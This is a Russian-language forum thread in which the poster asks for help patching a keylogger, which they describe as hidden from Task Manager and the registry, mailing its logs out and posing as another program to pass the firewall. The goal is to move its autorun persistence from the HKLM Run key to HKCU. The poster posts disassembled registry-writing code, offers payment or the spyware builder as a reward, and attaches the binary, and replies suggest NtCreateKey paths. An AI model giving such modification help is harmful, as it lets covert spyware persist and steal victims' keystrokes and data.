Очень очень нужно апгрейд проге. Это не взлом я её честно купил. Кто поможет вознагражу материально (могу денежккой,могу поделится конфигуратором этой проги, а это собственно кейлоггер не видимый таске и в реестре с отсылкой на почту притворяющийся любой прогой для фаирвола, вобщем кульная вещь) А теперь собственно проблема Мне нужно чтобы моя прога прописывалась в авторан не в HKLM\software\microsoft...\run, а в ветке HKCU\software\microsoft...\run. (обусловлено правами доступа) Задача не тривиальна, как может показаться Вот участок кода в котором задаются параметры: путь, параметр, значение (примечания к коду) Код (Text): ;DS:[131446B6]=13144698 (proga.13144698), UNICODE "socketme.exe" 131412B5 . FF35 B6461413 PUSH DWORD PTR DS:[131446B6] 131412BB . FF35 B2461413 PUSH DWORD PTR DS:[131446B2] ;DS:[13144694]=1314467C (proga.1314467C), UNICODE " SpyForYou" 131412C1 . FF35 94461413 PUSH DWORD PTR DS:[13144694] 131412C7 . FF35 90461413 PUSH DWORD PTR DS:[13144690] ;DS:[13144678]=131445F4 (proga.131445F4), UNICODE ; "\Registry\Machine\Software\Microsoft\Windows\CurrentVers ion\Run" 131412CD . FF35 78461413 PUSH DWORD PTR DS:[13144678] 131412D3 . FF35 74461413 PUSH DWORD PTR DS:[13144674] 131412D9 . E8 A3150000 CALL proga.13142881 Ну всё здесь нормально а вот дальше... Код (Text): 13142881 /$ 55 PUSH EBP 13142882 |. 8BEC MOV EBP,ESP 13142884 |. 51 PUSH ECX 13142885 |. 53 PUSH EBX 13142886 |. 8D0D 50471413 LEA ECX,DWORD PTR DS:[13144750] 1314288C |. 33C0 XOR EAX,EAX 1314288E |. C701 18000000 MOV DWORD PTR DS:[ECX],18 13142894 |. 8941 04 MOV DWORD PTR DS:[ECX+4],EAX 13142897 |. 8D5D 08 LEA EBX,DWORD PTR SS:[EBP+8] 1314289A |. 53 PUSH EBX 1314289B |. 8F41 08 POP DWORD PTR DS:[ECX+8] 1314289E |. C741 0C 400000>MOV DWORD PTR DS:[ECX+C],40 131428A5 |. 8941 10 MOV DWORD PTR DS:[ECX+10],EAX 131428A8 |. 8941 14 MOV DWORD PTR DS:[ECX+14],EAX 131428AB |. 68 84471413 PUSH proga.13144784 131428B0 |. 6A 00 PUSH 0 131428B2 |. 6A 00 PUSH 0 131428B4 |. 6A 00 PUSH 0 131428B6 |. 68 50471413 PUSH proga.13144750 131428BB |. 68 3F000F00 PUSH 0F003F 131428C0 |. 68 88471413 PUSH proga.13144788 131428C5 |. FF15 74471413 CALL DWORD PTR DS:[13144774] 131428CB |. 33C0 XOR EAX,EAX 131428CD |. 66:8B45 1A MOV AX,WORD PTR SS:[EBP+1A] 131428D1 |. 50 PUSH EAX 131428D2 |. FF75 1C PUSH DWORD PTR SS:[EBP+1C] 131428D5 |. 6A 01 PUSH 1 131428D7 |. 6A 00 PUSH 0 131428D9 |. 8D5D 10 LEA EBX,DWORD PTR SS:[EBP+10] 131428DC |. 53 PUSH EBX 131428DD |. FF35 88471413 PUSH DWORD PTR DS:[13144788] 131428E3 |. FF15 70471413 CALL DWORD PTR DS:[13144770] 131428E9 |. A1 88471413 MOV EAX,DWORD PTR DS:[13144788] 131428EE |. 5B POP EBX 131428EF |. 59 POP ECX 131428F0 |. C9 LEAVE 131428F1 \. C2 1800 RETN 18 Вобщем я туплю, тем более что из ADVAPI32 используются только SetSecurityInfo SetEntriesInAclW GetSecurityInfo, то есть для записи в реестр нет Прикрепляю текстовый вариант проги в дебаггере, сорцев нет Помогите пожалуйста!
если у кого то возникли мысли исправить \Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run на registry\user\software... пробовал нифига и current_user и HKCU...
то, что Reg*-функций нет в импорте еще не значит, что они не используются а \Registry\User\Software... не пробовал?
rmn пробовал User\Software ничего PE_Kill, поподробней пожалуйста...Это ты про 80000001h? Где их искать, в адресе, стеке, может регистрах
Вот сам файл (не жатый) Поможет разобратся. Если вздумаете запускать, удаление этого кейлоггера с помощью ctrl+alt+F12, лог он собирает на диске С, отправляет от имени IE _1211672842__proga.exe
Программа создает ключ в реестре с помощью недокументированной функции NtCreateKey() (см. ZwCreateKey). Судя по MSDN'у, с помощью ZwCreateKey() добраться до HKEY_CURRENT_USER нельзя. В качестве еще одной попытки поробуй строчку "\Registry\User\CurrentUser", документированную в описании RtlCreateRegistryKey().
